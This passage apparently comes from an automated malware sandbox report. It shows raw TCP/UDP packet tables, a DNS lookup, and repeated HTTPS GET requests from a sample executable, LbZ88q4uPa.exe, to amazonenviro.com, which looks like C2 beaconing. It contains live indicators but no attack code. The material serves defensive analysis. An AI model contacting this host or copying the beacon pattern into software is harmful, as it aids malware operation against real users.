                    Jan 14, 2025 08:24:58.591643095 CET44350147166.62.27.188192.168.2.4
                    Jan 14, 2025 08:24:58.591761112 CET50147443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:24:58.591985941 CET50147443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:24:58.592006922 CET44350147166.62.27.188192.168.2.4
                    Jan 14, 2025 08:24:58.592019081 CET50147443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:24:58.592025042 CET44350147166.62.27.188192.168.2.4
                    Jan 14, 2025 08:24:58.706527948 CET50148443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:24:58.706552029 CET44350148166.62.27.188192.168.2.4
                    Jan 14, 2025 08:24:58.706621885 CET50148443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:24:58.706746101 CET50148443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:24:58.706890106 CET44350148166.62.27.188192.168.2.4
                    Jan 14, 2025 08:24:58.708405972 CET50148443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:24:58.709372997 CET50149443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:24:58.709418058 CET44350149166.62.27.188192.168.2.4
                    Jan 14, 2025 08:24:58.711416006 CET50149443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:24:58.711762905 CET50149443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:24:58.711781025 CET44350149166.62.27.188192.168.2.4
                    Jan 14, 2025 08:24:59.616590977 CET44350149166.62.27.188192.168.2.4
                    Jan 14, 2025 08:24:59.617140055 CET50149443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:24:59.662939072 CET50149443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:24:59.662971973 CET44350149166.62.27.188192.168.2.4
                    Jan 14, 2025 08:24:59.663233042 CET44350149166.62.27.188192.168.2.4
                    Jan 14, 2025 08:24:59.680099010 CET50149443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:24:59.723334074 CET44350149166.62.27.188192.168.2.4
                    Jan 14, 2025 08:25:00.242979050 CET44350149166.62.27.188192.168.2.4
                    Jan 14, 2025 08:25:00.243458986 CET44350149166.62.27.188192.168.2.4
                    Jan 14, 2025 08:25:00.243963003 CET50149443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:25:00.244041920 CET50149443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:25:00.244043112 CET50149443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:25:00.244070053 CET44350149166.62.27.188192.168.2.4
                    Jan 14, 2025 08:25:00.244081020 CET44350149166.62.27.188192.168.2.4
                    Jan 14, 2025 08:25:00.421006918 CET50150443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:25:00.421036959 CET44350150166.62.27.188192.168.2.4
                    Jan 14, 2025 08:25:00.421108007 CET50150443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:25:00.421212912 CET50150443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:25:00.421500921 CET44350150166.62.27.188192.168.2.4
                    Jan 14, 2025 08:25:00.421619892 CET50150443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:25:00.424000025 CET50151443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:25:00.424061060 CET44350151166.62.27.188192.168.2.4
                    Jan 14, 2025 08:25:00.424248934 CET50151443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:25:00.424613953 CET50151443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:25:00.424635887 CET44350151166.62.27.188192.168.2.4
                    Jan 14, 2025 08:25:01.342888117 CET44350151166.62.27.188192.168.2.4
                    Jan 14, 2025 08:25:01.343332052 CET50151443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:25:01.345838070 CET50151443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:25:01.345849991 CET44350151166.62.27.188192.168.2.4
                    Jan 14, 2025 08:25:01.346604109 CET44350151166.62.27.188192.168.2.4
                    Jan 14, 2025 08:25:01.347963095 CET50151443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:25:01.395330906 CET44350151166.62.27.188192.168.2.4
                    Jan 14, 2025 08:25:01.943200111 CET44350151166.62.27.188192.168.2.4
                    Jan 14, 2025 08:25:01.945123911 CET44350151166.62.27.188192.168.2.4
                    Jan 14, 2025 08:25:01.945204973 CET50151443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:25:01.945307970 CET50151443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:25:01.945307970 CET50151443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:25:01.945329905 CET44350151166.62.27.188192.168.2.4
                    Jan 14, 2025 08:25:01.945338964 CET44350151166.62.27.188192.168.2.4
                    Jan 14, 2025 08:25:02.058945894 CET50152443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:25:02.058995962 CET44350152166.62.27.188192.168.2.4
                    Jan 14, 2025 08:25:02.059092999 CET50152443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:25:02.063949108 CET50152443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:25:02.064029932 CET44350152166.62.27.188192.168.2.4
                    Jan 14, 2025 08:25:02.064110994 CET50152443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:25:02.066863060 CET50153443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:25:02.066956043 CET44350153166.62.27.188192.168.2.4
                    Jan 14, 2025 08:25:02.067039967 CET50153443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:25:02.067435026 CET50153443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:25:02.067464113 CET44350153166.62.27.188192.168.2.4
                    Jan 14, 2025 08:25:02.975994110 CET44350153166.62.27.188192.168.2.4
                    Jan 14, 2025 08:25:02.976140022 CET50153443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:25:02.983788967 CET50153443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:25:02.983840942 CET44350153166.62.27.188192.168.2.4
                    Jan 14, 2025 08:25:02.984596968 CET44350153166.62.27.188192.168.2.4
                    Jan 14, 2025 08:25:02.986124992 CET50153443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:25:03.031327009 CET44350153166.62.27.188192.168.2.4
                    Jan 14, 2025 08:25:03.557920933 CET44350153166.62.27.188192.168.2.4
                    Jan 14, 2025 08:25:03.558017015 CET44350153166.62.27.188192.168.2.4
                    Jan 14, 2025 08:25:03.558096886 CET50153443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:25:03.558283091 CET50153443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:25:03.558305025 CET44350153166.62.27.188192.168.2.4
                    Jan 14, 2025 08:25:03.558317900 CET50153443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:25:03.558322906 CET44350153166.62.27.188192.168.2.4
                    Jan 14, 2025 08:25:03.672918081 CET50154443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:25:03.672955990 CET44350154166.62.27.188192.168.2.4
                    Jan 14, 2025 08:25:03.673042059 CET50154443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:25:03.673232079 CET50154443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:25:03.673321962 CET44350154166.62.27.188192.168.2.4
                    Jan 14, 2025 08:25:03.673382998 CET50154443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:25:03.676383018 CET50155443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:25:03.676491022 CET44350155166.62.27.188192.168.2.4
                    Jan 14, 2025 08:25:03.676575899 CET50155443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:25:03.676902056 CET50155443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:25:03.676937103 CET44350155166.62.27.188192.168.2.4
                    Jan 14, 2025 08:25:04.590507984 CET44350155166.62.27.188192.168.2.4
                    Jan 14, 2025 08:25:04.590604067 CET50155443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:25:04.592669964 CET50155443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:25:04.592681885 CET44350155166.62.27.188192.168.2.4
                    Jan 14, 2025 08:25:04.593444109 CET44350155166.62.27.188192.168.2.4
                    Jan 14, 2025 08:25:04.595046997 CET50155443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:25:04.635354042 CET44350155166.62.27.188192.168.2.4
                    Jan 14, 2025 08:25:05.172689915 CET44350155166.62.27.188192.168.2.4
                    Jan 14, 2025 08:25:05.172867060 CET44350155166.62.27.188192.168.2.4
                    Jan 14, 2025 08:25:05.172943115 CET50155443192.168.2.4166.62.27.188

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jan 14, 2025 08:22:58.282007933 CET5117053192.168.2.41.1.1.1
                    Jan 14, 2025 08:22:58.294611931 CET53511701.1.1.1192.168.2.4

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Jan 14, 2025 08:22:58.282007933 CET192.168.2.41.1.1.10x8581Standard query (0)amazonenviro.comA (IP address)IN (0x0001)false

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Jan 14, 2025 08:22:58.294611931 CET1.1.1.1192.168.2.40x8581No error (0)amazonenviro.com166.62.27.188A (IP address)IN (0x0001)false

                    HTTP Request Dependency Graph

                    • amazonenviro.com

                    HTTPS Proxied Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.449731166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:22:59 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:23:00 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:22:59 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.449733166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:23:01 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:23:01 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:23:01 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.449735166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:23:02 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:23:03 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:23:03 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.449737166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:23:04 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:23:05 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:23:04 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    4192.168.2.449739166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:23:06 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:23:06 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:23:06 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    5192.168.2.449741166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:23:07 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:23:08 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:23:08 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    6192.168.2.449743166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:23:09 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:23:09 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:23:09 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    7192.168.2.449745166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:23:11 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:23:11 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:23:11 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    8192.168.2.449747166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:23:12 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:23:13 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:23:13 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    9192.168.2.449749166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:23:14 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:23:14 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:23:14 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    10192.168.2.449751166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:23:15 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:23:16 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:23:16 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    11192.168.2.449754166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:23:17 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:23:18 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:23:17 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    12192.168.2.449760166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:23:19 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:23:19 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:23:19 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    13192.168.2.449763166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:23:20 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:23:21 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:23:21 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    14192.168.2.449765166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:23:22 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:23:22 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:23:22 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    15192.168.2.449767166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:23:23 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:23:24 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:23:24 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    16192.168.2.449769166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:23:25 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:23:26 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:23:26 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    17192.168.2.449771166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:23:27 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:23:27 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:23:27 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    18192.168.2.449773166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:23:28 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:23:29 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:23:29 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    19192.168.2.449775166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:23:30 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:23:31 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:23:30 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    20192.168.2.449777166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:23:32 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:23:32 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:23:32 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    21192.168.2.449779166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:23:33 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:23:34 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:23:34 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    22192.168.2.449781166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:23:35 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:23:35 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:23:35 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    23192.168.2.449783166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:23:37 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:23:37 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:23:37 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    24192.168.2.449785166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:23:38 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:23:39 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:23:39 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    25192.168.2.449787166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:23:40 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:23:41 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:23:40 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    26192.168.2.449789166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
